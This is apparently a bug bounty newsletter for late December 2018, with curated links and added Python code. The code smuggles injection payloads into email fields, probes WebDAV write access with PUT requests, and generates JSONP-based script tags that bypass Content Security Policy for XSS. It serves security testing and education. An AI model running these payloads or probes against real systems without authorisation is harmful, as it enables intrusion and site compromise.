Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 21 to 28 December.
Also, I wish you and your family a very happy new year, full of bugs, bounties, fun, health & happiness!
Our favorite 5 hacking items
1. Tip of the week
I love the technical tricks for bug hunters that @intigriti shares on Twitter. I regularly add them to the tweets collection at the end of this newsletter.
But this trick in particular blew my mind! Here’s why: Have you ever tested a login or contact form, entered a valid email address, intercepted the request with Burp, then replaced the email with XSS/SQLi/SSTI/RCE detection payloads? This is a way to bypass client-side validation of the email field. So what do you do if you get an “invalid email” response from the server?
To me, that was the end of testing for input validation on that field, since the check is done server-side.
But according to @securinti, you can smuggle any payload and still have the server accept the address as a valid email by putting the payload between round brackets. RFC 5322 allows a parenthesised comment in both the local part and the domain part of an address, so a comment-aware validator accepts yourname@(${}<>'/"*-)domain.com or yourname(${}<>'/"*-)@domain.com, while the application may still store or reflect the raw string.
Amazing, right? I can’t wait to re-test all forms in my bug bounty notes.
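As an added example (my own code, not from the tip or the newsletter), here is why the trick works and what a safe server-side check looks like, in Python. STRICT_RE stands in for a typical strict validator, the three smuggled positions are the ones RFC 5322 comments allow, and the helper names are mine:

```python
import re

# The detection payload from the tip: one string that probes for XSS, SSTI,
# SQLi and shell metacharacter handling at once.
PAYLOAD = "${}<>'/\"*-"

# A typical strict server-side email check (constructed for this example, not
# taken from any framework). It rejects the raw payload, which is the
# "invalid email" response that used to end the test.
STRICT_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def smuggle(local, domain, payload=PAYLOAD):
    """Wrap the payload in an RFC 5322 comment at each position the grammar
    allows: before the @, right after it, and after the domain."""
    return [
        f"{local}({payload})@{domain}",
        f"{local}@({payload}){domain}",
        f"{local}@{domain}({payload})",
    ]


def strip_comments(addr):
    """Remove (possibly nested) RFC 5322 comments, leaving quoted strings
    untouched. Raises ValueError on unbalanced input."""
    out, depth, in_quote, i = [], 0, False, 0
    while i < len(addr):
        c = addr[i]
        if c == "\\" and i + 1 < len(addr):      # quoted-pair: keep or drop both chars
            if depth == 0:
                out.append(addr[i:i + 2])
            i += 2
            continue
        if in_quote:                              # inside "...": parentheses are literal
            if c == '"':
                in_quote = False
            out.append(c)
        elif depth > 0:                           # inside a comment: drop everything
            depth += (c == "(") - (c == ")")
        elif c == "(":
            depth = 1
        else:
            if c == '"':
                in_quote = True
            out.append(c)
        i += 1
    if depth or in_quote:
        raise ValueError("unbalanced comment or quoted string")
    return "".join(out)


def comment_tolerant_valid(addr):
    """What an RFC 5322 aware validator effectively does: strip comments, then
    apply the strict check. It accepts every smuggled variant, so if the
    application then stores or reflects the RAW string, the payload reaches
    the template, query or shell."""
    try:
        return STRICT_RE.match(strip_comments(addr)) is not None
    except ValueError:
        return False


def canonical_email(addr):
    """Safe handling: return the comment-free address if it is valid, else None.
    Persist and use only this value (or reject input that differs from it)."""
    try:
        clean = strip_comments(addr)
    except ValueError:
        return None
    return clean if STRICT_RE.match(clean) else None


if __name__ == "__main__":
    for variant in smuggle("yourname", "domain.com"):
        print(f"{variant:45} strict={bool(STRICT_RE.match(variant))} "
              f"tolerant={comment_tolerant_valid(variant)} stored={canonical_email(variant)}")
```

When testing, paste the three variants from smuggle() into the intercepted request one at a time; a server that answers "valid" to any of them but "invalid" to the bare payload is validating with comments stripped, and the next question is whether it also uses the stripped form downstream.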
2. Writeup of the week
From Hunting for a Laptop to Hunting down Remote Code Execution
This is the writeup of a WebDAV RCE on Asus. It’s a simple but impactful misconfiguration to test for whenever you see the 403 error page typical of Microsoft IIS.
Anil Tom found one on http://stw.asus.com/ and tried to add the site as a new network location on his laptop (Windows maps such locations over WebDAV) to see if WebDAV was enabled on the server.
It worked! So just by adding http://stw.asus.com/ as a network location, he was able to create new files on the server!
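If you would rather check from the command line than through the Windows wizard, here is an added example (my own code, not from the writeup) that reads the server's OPTIONS response, reports whether WebDAV and write methods are advertised, and confirms write access with a harmless marker file that it deletes again. The sample response is constructed to look like an IIS host with WebDAV on; the header names are the ones IIS sends:

```python
import http.client
import secrets
from urllib.parse import urlsplit

# Constructed sample OPTIONS response, modelled on an IIS host with WebDAV
# enabled. It is not a capture from the server in the writeup.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, "
    "DELETE, COPY, MOVE, LOCK, UNLOCK\r\n"
    "DAV: 1,2,3\r\n"
    "MS-Author-Via: DAV\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}


def parse_headers(raw):
    """Header block of a raw HTTP response -> {lower-case name: value}."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = {}
    for line in head.split("\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def assess_webdav(raw):
    """Decide from an OPTIONS response whether WebDAV is on and which
    write methods the server advertises."""
    h = parse_headers(raw)
    allowed = {m.strip().upper() for m in h.get("allow", "").split(",") if m.strip()}
    dav_advertised = "dav" in h or h.get("ms-author-via", "").upper() == "DAV"
    return {
        "enabled": dav_advertised or bool(allowed & {"PROPFIND", "MKCOL"}),
        "write_methods": sorted(allowed & WRITE_METHODS),
        "server": h.get("server", ""),
    }


def _connect(url, timeout=10):
    u = urlsplit(url)
    cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    return cls(u.hostname, u.port, timeout=timeout), (u.path or "/")


def options_raw(url, timeout=10):
    """Send OPTIONS and rebuild the response head as text (network; not run offline)."""
    conn, path = _connect(url, timeout)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    lines = [f"HTTP/1.1 {resp.status} {resp.reason}"]
    lines += [f"{k}: {v}" for k, v in resp.getheaders()]
    conn.close()
    return "\r\n".join(lines) + "\r\n\r\n"


def verify_put(url, timeout=10):
    """Confirm write access with a harmless marker file, then remove it.
    Returns (put_status, delete_status); 201/204 means the server took it."""
    name = f"/webdav-probe-{secrets.token_hex(4)}.txt"
    conn, path = _connect(url, timeout)
    base = path.rstrip("/")
    conn.request("PUT", base + name, body=b"webdav probe\n",
                 headers={"Content-Type": "text/plain"})
    put = conn.getresponse()
    put.read()
    conn.request("DELETE", base + name)
    delete = conn.getresponse()
    delete.read()
    conn.close()
    return put.status, delete.status


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    raw = options_raw(target) if target else SAMPLE_OPTIONS_RESPONSE
    verdict = assess_webdav(raw)
    print(verdict)
    if target and "PUT" in verdict["write_methods"]:
        print("PUT/DELETE status:", verify_put(target))
```

Run it with no arguments to see the verdict on the constructed sample, or with a URL you are authorised to test; a text marker is enough as proof, there is no need to upload anything executable.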
3. Resource of the week
More and more sites use Content Security Policy (CSP), especially those with a bug bounty program. So this repo (JSONBee) can come in very handy if you find an XSS and need to bypass CSP.
If you just want the list of payloads to bypass CSP for different sites (Google, Blogger, Uber, Yahoo, Alibaba…), check out the file Jsonp.txt.
Otherwise, you can get more information on CSP and JSONbee on the Bypassing CSP: Automated discovery of JSONP endpoints conference slides.
And you can play with csp_lab.php as a testbed to practice bypassing CSP.
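The core of the technique is matching the page's script-src whitelist against known JSONP endpoints, since a whitelisted host that reflects a callback parameter into a script response hands you script execution under the policy. As an added example (my own code, not JSONBee's), here is a simplified CSP source matcher in Python that does that and emits the script tag to inject. The endpoint list and the sample policy are constructed on made-up hosts; the real endpoints are the ones in Jsonp.txt:

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed JSONP endpoints on made-up hosts, standing in for the real ones
# in the repo's Jsonp.txt. The callback parameter is the point: its value is
# reflected verbatim into a script response.
JSONP_ENDPOINTS = [
    "https://api.jsonp.example/v1/users?callback=",
    "https://static.cdn.example/js/widget?cb=",
    "https://other.example/feed?jsonp=",
]

# Constructed policy for a hypothetical target page.
SAMPLE_CSP = ("default-src 'self'; script-src 'self' https://*.jsonp.example "
              "https://static.cdn.example/js/; object-src 'none'")


def parse_csp(header):
    """'script-src a b; object-src c' -> {'script-src': ['a', 'b'], ...}"""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def script_sources(policy):
    """script-src governs <script src>; default-src is the fallback."""
    return policy.get("script-src", policy.get("default-src", []))


def source_allows(source, url, page_origin):
    """Does one CSP source expression permit loading url? Covers 'self', '*',
    scheme-sources, host-sources with a leading *. wildcard, ports and paths.
    Simplified relative to the spec (no http->https upgrade, no redirects)."""
    source = source.lower()
    u = urlsplit(url)
    u_port = u.port or DEFAULT_PORTS.get(u.scheme)
    if source.startswith("'"):                        # keywords, nonces, hashes
        if source != "'self'":
            return False
        p = urlsplit(page_origin)
        p_port = p.port or DEFAULT_PORTS.get(p.scheme)
        return (u.scheme, u.hostname, u_port) == (p.scheme, p.hostname, p_port)
    if source == "*":
        return u.scheme in DEFAULT_PORTS
    if source.endswith(":") and "/" not in source:    # scheme-source, e.g. https:
        return u.scheme == source[:-1]
    s = urlsplit(source if "://" in source else "//" + source)
    if s.scheme and s.scheme != u.scheme:
        return False
    host = s.hostname or ""
    if host.startswith("*."):
        if not (u.hostname or "").endswith(host[1:]):
            return False
    elif host != u.hostname:
        return False
    try:
        s_port = s.port or DEFAULT_PORTS.get(s.scheme or u.scheme)
    except ValueError:                                # port wildcard "*"
        s_port = u_port
    if s_port != u_port:
        return False
    if s.path and s.path != "/":                      # directory prefix or exact file
        if s.path.endswith("/"):
            return u.path.startswith(s.path)
        return u.path == s.path
    return True


def find_bypasses(csp_header, page_origin, endpoints=JSONP_ENDPOINTS,
                  payload="alert(document.domain)"):
    """Every (source, endpoint, script tag) where a whitelisted source covers
    a JSONP endpoint; the tag is what goes into the XSS sink."""
    hits = []
    for src in script_sources(parse_csp(csp_header)):
        for ep in endpoints:
            if source_allows(src, ep, page_origin):
                hits.append((src, ep, f'<script src="{ep}{payload}//"></script>'))
    return hits


if __name__ == "__main__":
    for src, ep, tag in find_bypasses(SAMPLE_CSP, "https://target.example"):
        print(f"{src} -> {ep}\n  {tag}")
```

Feed it the target's actual Content-Security-Policy header and the endpoint list from Jsonp.txt; the trailing // in the generated tag comments out whatever the endpoint appends after the callback name.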
4. Tool of the week
PA Toolkit: Pentester Academy Wireshark Toolkit
I’ve always had trouble remembering the syntax of Wireshark filters, so this tool is a blessing.
It’s a collection of plugins that extend the functionality of Wireshark. They allow you to quickly get a list of all visited websites, downloaded files, POST/GET requests, list DNS servers, etc.
5. Tutorial of the week
I love me some good WAF/filter bypass techniques! It’s what makes a difference between being stuck in front of a WAF and finding bugs that other hunters missed even in old programs.
This is a great tutorial on how to bypass different PHP filters, for example when /etc/passwd, the system() function, or double & single quotes (" and ') are blocked. It’s worth reading & taking notes of tricks to test on your next bug hunt/pentest.
Other amazing things we stumbled upon this week
Videos
Podcasts
- The Top Ten “Application Security Podcast” Episodes of 2018
- What’s It Like to be a High-End Red Team Member? — CyberSpeak Podcast
- Security In Five episode 403 (Blur password manager had a breach, the reason will make you facepalm): http://securityinfive.libsyn.com/episode-403-blur-password-manager-had-a-breach-the-reason-will-make-you-facepalm
- Security In Five episode 404 (Routers with this feature enabled were hacked to promote YouTube stars, do you have this on?): http://securityinfive.libsyn.com/episode-404-routers-with-this-feature-enabled-were-hacked-to-promote-youtube-stars-do-you-have-this-on
Conferences & Webcasts
- RDP Logging Bypass and Azure Active Directory Recon
- JSFoo 2018 Day 1 & JSFoo 2018 Day 2, particularly:
- From Zero to Zero Day
- Wallet.fail
Slides only
Upcoming webinars
- Live webinar: Let’s talk about XSS and React - by Jim Manico: 01/02/2019
- Career Opportunities in Information Security |by Shobha Jagathpal | WINJA Webinar: 01/03/2019
Tutorials
Medium to advanced
- A Deeper Look into XSS Payloads
- XSS with length restriction
- Edit websocket requests with Burp
- SSH Examples, Tips & Tunnels
- iOS Pentesting Tools Part 3: Frida and Objection
- Why Facebook’s api starts with a for loop
Beginners corner
- Exploiting Jenkins Groovy Script Console in Multiple Ways
- Understanding the iOS File System
- A Little Guide to SMB Enumeration
- Exploiting Put Method
- Basic XPath Injection
- Preliminary SQL Injection (Part 1)
- Preliminary SQL Injection (Part 2)
- Learn to Use CURL Command in Linux With These Examples
- Hacking Juice Shop, the DevSecOps Way
- Penetration Testing on Group Policy Preferences
- A 9-step recipe to crack a NTLMv2 Hash from a freshly acquired .pcap
- Metasploit Basics, Part 22: Exploiting and Controlling a System When You Have Physical Access
Writeups
Challenge writeups
Pentest & Responsible disclosure writeups
- Exploiting an 18 Year Old Bug
- Saving the Email Subscribers of Rentomojo
- This account has been hijacked (temporarily)!
- Twitter is Broken
This was not me tweeting. Gave my number as a Poc to someone and they proved they can hack my twitter account. Just from knowing my number. 🤦♂️🤦♂️🤦♂️ https://t.co/yNzsS5txdl
— zseano💫 (@zseano) December 26, 2018
- Case Study: Wreaking Havoc via an API
- The easiest “HACK” ever
- Kallithea <= 0.3.4 Incorrect access control and XSS
Bug bounty writeups
- Race condition on Hackerone ($2,100)
- Authorization flaw on Hackerone ($500)
- Unrestricted file upload on Hackerone
- Unrestricted file upload on private program
- IDOR on Google
- Client-side validation bypass on Netflix & Linxo
See more writeups on The list of bug bounty writeups.
Tools
If you don’t have time
- Notable: The markdown-based note-taking app that doesn’t suck
- Adhrit: Open source Android APK reversing and analysis tool that can help security researchers and CTF enthusiasts alike. The tool is an effort to cut down on the amount of time spent on reversing and basic reconnaissance of Android applications.
- Jsdir / Jspathextractor: Burp Suite extension that extracts hidden paths from js files and beautifies it
- Ipify: Public API to get your public IP & geolocation data programmatically
More tools, if you have time
- Bolt: A dumb CSRF scanner
- SerializationDumper: A tool to dump Java serialization streams in a more human readable form
- ZIP Shotgun: Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities
- PoC for CVE-2018-1002105
- Pocsuite: Open-source remote vulnerability testing framework developed by the Knownsec Security Team
- L.A.S.T.: Linux Automated Security scanning Tool
- Sandmap & Tutorial: Nmap on steroids! Simple CLI with the ability to run pure Nmap engine, 31 modules with 459 scan profiles
- Netcap: A framework for secure and scalable network traffic analysis
- Marats-h1-disclosed: Hackerone hacktivity parser app that sends browser notifications about newly disclosed reports (see also The difference with existing tools)
- VulnStream website & Github repo: Using Shodan’s streaming API to show a live stream of vulnerable devices as Shodan finds them
- Infoga: Email OSINT
Misc. pentest & bug bounty resources
- OWASP Internet of Things (IoT) Top 10 2018
- Inside the mind of a hacker 2019 Edition
- OSINT Resources for 2019
- Hacker Roadmap: A guide for amateur pen testers and a collection of hacking tools, resources and references to practice ethical hacking, pen testing and web security
- How HTTPS works …in a comic!
- APIsecurity.io: Issue 13: Microsoft services and Chromecast hacks, the limitations of WAF
Articles
- The best write-ups 2018 brought us
- The Importance of the Content-Type Header in HTTP Requests
- A Review of my Bug Hunting Journey
- Swig Security Review 2018: Part I & Part II
- @EdOverflow’s answer to “What are the common features to identify XSS attack from Apache log file?”
- Publicly accessible .ENV files
Challenges
- Ctf.infosecinstitute.com: CTF with bounties
- Serverless.fail: DVSA (Damn Vulnerable Serverless Application) online & DVSA lessons
- OWASP ‘ServerlessGoat’: A Vulnerable Demo Serverless Application
News
- Sennheiser discloses monumental blunder that cripples HTTPS on PCs and Macs: Sennheiser’s HeadSetup app installed a self-signed root certificate. The private key was encrypted with the passphrase “SennheiserCC”, which was stored in plaintext in a configuration file. Attackers could easily extract the passphrase and use the key to sign a TLS certificate for any website that every machine with HeadSetup installed would trust.
- In January, the EU starts running Bug Bounties on Free and Open Source Software
In January the European Commission is launching 14 out of a total of 15 bug bounties on Free Software projects that the EU institutions rely on
At least 61 percent of apps we tested automatically transfer data to Facebook the moment a user opens the app. This happens whether people have a Facebook account or not, or whether they are logged into Facebook or not.
It’s enough to take photos from a distance of five meters, and it might work to go to a press conference and take photos of them
Non technical
- Should I go to university?
- Automatically storing my reading backlog and other notes
- 10 Personal Finance Lessons for Technology Professionals
- Survival Tips For Women In Tech
- Social Skills For Information Security Professionals: Effective Leadership: Free book by Dawid Balut
- 2018: Top 10 biggest news stories from Linux and open source world
- 2018: The year of the data breach tsunami
- The year in #StupidSecurity
Tweeted this week
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 12/21/2018 to 12/28/2018
Have a nice week folks!
If you want to be notified when new articles (including this newsletter) are published, you can subscribe to this blog.
And if you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…